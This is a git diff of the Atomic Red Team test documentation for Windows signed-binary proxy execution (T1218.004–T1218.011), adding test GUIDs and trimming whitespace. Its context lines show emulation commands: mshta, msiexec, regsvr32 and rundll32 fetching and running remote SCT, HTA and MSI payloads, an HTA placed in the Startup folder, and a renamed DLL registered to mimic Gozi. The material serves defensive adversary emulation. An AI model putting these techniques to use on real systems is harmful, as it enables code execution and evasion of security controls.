 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -87,7 +91,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -108,10 +112,14 @@ executed successfuly.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d43a5bde-ae28-4c55-a850-3f4c80573503
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -165,7 +173,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -185,10 +193,14 @@ Executes the installer assembly class constructor. Upon execution, version infor
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -242,7 +254,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -262,10 +274,14 @@ Executes the Install Method. Upon execution, version information will be display
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -319,7 +335,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -339,10 +355,14 @@ Executes the Uninstall Method. Upon execution, version information will be displ
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -396,7 +416,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -416,10 +436,14 @@ Executes the Uninstall Method. Upon execution, version information will be displ
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 06d9deba-f732-48a8-af8e-bdd6e4d98c1d
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -473,7 +497,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -493,10 +517,14 @@ Executes the Uninstall Method. Upon execution, help information will be displaye
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5a683850-1145-4326-a0e5-e91ced3c6022
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 | assembly_dir | directory to drop the compiled installer assembly | Path | $Env:TEMP&#92;|
@@ -550,7 +578,7 @@ Remove-Item -Path $InstallerAssemblyFullPath -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -571,10 +599,14 @@ will be displayed, along with other information about the opperation. "The trans
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 559e6d06-bb42-4307-bff7-3b95a8254bad
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | test_harness | location of the test harness script - Invoke-BuildAndInvokeInstallUtilAssembly | Path | PathToAtomicsFolder&#92;T1218.004&#92;src&#92;InstallUtilTestHarness.ps1|
 
@@ -631,7 +663,7 @@ Remove-Item -Path "$Env:windir\System32\Tasks\notepad.exe" -ErrorAction Ignore
 ##### Description: InstallUtil test harness script must be installed at specified location (#{test_harness})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path "#{test_harness}") {exit 0} else {exit 1} 
+if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 077398a1..8682f1e1 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -39,10 +39,14 @@ Test execution of a remote script using mshta.exe. Upon execution calc.exe will
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1483fab9-4f52-4217-a9ce-daa9d7747cae
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct|
 
@@ -70,6 +74,10 @@ Upon execution, a new PowerShell windows will be opened that displays user infor
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 906865c3-e05f-4acc-85c4-fbc185455095
+
+
+
 
 
 
@@ -94,10 +102,14 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c4b97eeb-5249-4455-a607-59f95485cb45
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | temp_file | temp_file location for hta | string | $env:appdata&#92;Microsoft&#92;Windows&#92;Start Menu&#92;Programs&#92;Startup&#92;T1218.005.hta|
 | hta_url | URL to HTA file for execution | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta|
@@ -130,10 +142,14 @@ Executes an HTA Application using JScript script engine using local UNC path sim
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 007e5672-2088-4853-a562-7490ddc19447
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_engine | Script Engine to use | string | JScript|
 | hta_file_path | HTA file name and or path to be used | string | Test.hta|
@@ -156,7 +172,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -175,10 +191,14 @@ Executes an HTA Application using JScript script engine simulating double click.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 58a193ec-131b-404e-b1ca-b35cf0b18c33
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_engine | Script Engine to use | string | JScript|
 | hta_file_path | HTA file name and or path to be used | string | Test.hta|
@@ -200,7 +220,7 @@ Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_e
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -219,10 +239,14 @@ Executes an HTA Application by directly downloading from remote URI.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 39ceed55-f653-48ac-bd19-aceceaf525db
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
 | hta_uri | URI to HTA | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta|
@@ -244,7 +268,7 @@ Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -263,10 +287,14 @@ Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Ha
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e7e3a525-7612-4d68-a5d3-c4649181b8af
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | rundll32_file_path | Location of rundll32.exe | string | $env:windir&#92;system32&#92;rundll32.exe|
 | script_engine | Script Engine to use | string | JScript|
@@ -289,7 +317,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -308,10 +336,14 @@ Executes an HTA Application with JScript Engine and Inline Protocol Handler.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
 | script_engine | Script Engine to use | string | JScript|
@@ -334,7 +366,7 @@ Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -353,10 +385,14 @@ Executes an HTA Application with Simulate lateral movement over UNC Path.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** b8a8bdb2-7eae-490d-8251-d5e0295b2362
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mshta_file_path | Location of mshta.exe | string | $env:windir&#92;system32&#92;mshta.exe|
 
@@ -377,7 +413,7 @@ Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_fil
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 44f8b860..6af04be4 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -21,10 +21,14 @@ Execute arbitrary MSI file. Commonly seen in application installation. The MSI o
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | msi_payload | MSI file to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;Win32&#92;T1218.msi|
 
@@ -43,7 +47,7 @@ msiexec.exe /q /i "#{msi_payload}"
 ##### Description: T1218.msi must exist on disk at specified location (#{msi_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{msi_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -62,10 +66,14 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/Win32/T1218.msi|
 
@@ -93,10 +101,14 @@ By default, if the src folder is not in place, it will download the 64 bit versi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218.007&#92;src&#92;x64&#92;T1218.dll|
 
@@ -115,7 +127,7 @@ msiexec.exe /y "#{dll_payload}"
 ##### Description: T1218.dll must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index be140831..4f5b72e6 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -18,10 +18,14 @@ Execute arbitrary DLL file stored locally.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2430498b-06c0-4b92-a448-8ad263c388e2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_payload | DLL to execute | Path | PathToAtomicsFolder&#92;T1218.008&#92;src&#92;Win32&#92;T1218-2.dll|
 
@@ -40,7 +44,7 @@ odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
 ##### Description: T1218-2.dll must exist on disk at specified location (#{dll_payload})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_payload}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md
index 0ee1701a..d2b8d2e2 100644
--- a/atomics/T1218.009/T1218.009.md
+++ b/atomics/T1218.009/T1218.009.md
@@ -19,10 +19,14 @@ Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shou
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Location of the payload | Path | %tmp%&#92;T1218.009.dll|
 | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder&#92;T1218.009&#92;src&#92;T1218.009.cs|
@@ -47,7 +51,7 @@ del #{output_file} >nul 2>&1
 ##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1} 
+if (Test-Path #{source_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -68,10 +72,14 @@ along with other information about the assembly being installed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fd3c1c6a-02d2-4b72-82d9-71c527abb126
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Location of the payload | Path | $Env:TEMP&#92;T1218.009.dll|
 | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder&#92;T1218.009&#92;src&#92;T1218.009.cs|
@@ -102,7 +110,7 @@ Remove-Item $parentpath\T1218.009.tlb -ErrorAction Ignore | Out-Null
 ##### Description: The CSharp source file must exist on disk at specified location (#{source_file})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{source_file}) {exit 0} else {exit 1} 
+if (Test-Path #{source_file}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md
index 043c0a8c..b2a345a8 100644
--- a/atomics/T1218.010/T1218.010.md
+++ b/atomics/T1218.010/T1218.010.md
@@ -27,10 +27,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 449aa403-6aba-47ce-8a37-247d21ef0306
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filename | Name of the local file, include path. | Path | PathToAtomicsFolder&#92;T1218.010&#92;src&#92;RegSvr32.sct|
 | regsvr32path | Default location of Regsvr32.exe | Path | C:&#92;Windows&#92;system32|
@@ -51,7 +55,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 ##### Description: Regsvr32.sct must exist on disk at specified location (#{filename})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{filename}) {exit 0} else {exit 1} 
+if (Test-Path #{filename}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -72,10 +76,14 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct|
 | regsvr32path | Default location of Regsvr32.exe | Path | C:&#92;Windows&#92;system32|
@@ -103,10 +111,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | PathToAtomicsFolder&#92;T1218.010&#92;bin&#92;AllTheThingsx86.dll|
 | regsvr32path | Default location of Regsvr32.exe | Path | C:&#92;Windows&#92;system32|
@@ -127,7 +139,7 @@ IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dl
 ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_name}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -147,10 +159,14 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_file | Path to renamed dll file to be registered | Path | %temp%&#92;shell32.jpg|
 | regsvr32path | Default location of Regsvr32.exe | Path | C:&#92;Windows&#92;system32|
@@ -175,7 +191,7 @@ Replicating observed Gozi maldoc behavior registering a dll with an altered exte
 ##### Description: Test requires a renamed dll file
 ##### Check Prereq Commands:
 ```cmd
-if exist #{dll_file} ( exit 0 ) else ( exit 1 ) 
+if exist #{dll_file} ( exit 0 ) else ( exit 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -194,10 +210,14 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9d71c492-ea2e-4c08-af16-c6994cdf029f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | dll_name | Name of DLL to Install | String | PathToAtomicsFolder&#92;T1218.010&#92;bin&#92;AllTheThingsx86.dll|
 | regsvr32path | Default location of Regsvr32.exe | String | C:&#92;Windows&#92;system32|
@@ -218,7 +238,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 ##### Description: AllTheThingsx86.dll must exist on disk at specified location (#{dll_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{dll_name}) {exit 0} else {exit 1} 
+if (Test-Path #{dll_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index a49be86f..ce2c66cb 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -33,10 +33,14 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct|
 
@@ -64,10 +68,14 @@ Upon execution calc.exe will be launched
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 638730e7-7aed-43dc-bf8c-8117f805f5bb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | Command for rundll32.exe to execute | string | calc.exe|
 
@@ -95,10 +103,14 @@ Upon execution calc.exe will be launched
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d91cae26-7fc1-457b-a854-34c8aad48c89
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218.011&#92;src&#92;T1218.011.inf|
 
@@ -117,7 +129,7 @@ rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Singl
 ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -140,10 +152,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5e46a58e-cbf6-45ef-a289-ed7754603df9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218.011&#92;src&#92;T1218.011.inf|
 
@@ -162,7 +178,7 @@ rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_Sin
 ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -184,10 +200,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 41fa324a-3946-401e-bbdd-d7991c628125
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218.011&#92;src&#92;T1218.011_DefaultInstall.inf|
 
@@ -206,7 +226,7 @@ rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf
 ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -228,10 +248,14 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 71d771cd-d6b3-4f34-bc76-a63d47a10b19
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder&#92;T1218.011&#92;src&#92;T1218.011_DefaultInstall.inf|
 
@@ -250,7 +274,7 @@ rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execu
 ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} 
+if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -275,6 +299,10 @@ In this atomic, the sample hta file opens the calculator and the vbs file shows
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 22cfde89-befe-4e15-9753-47306b37a6e3
+
+
+
 
 
 
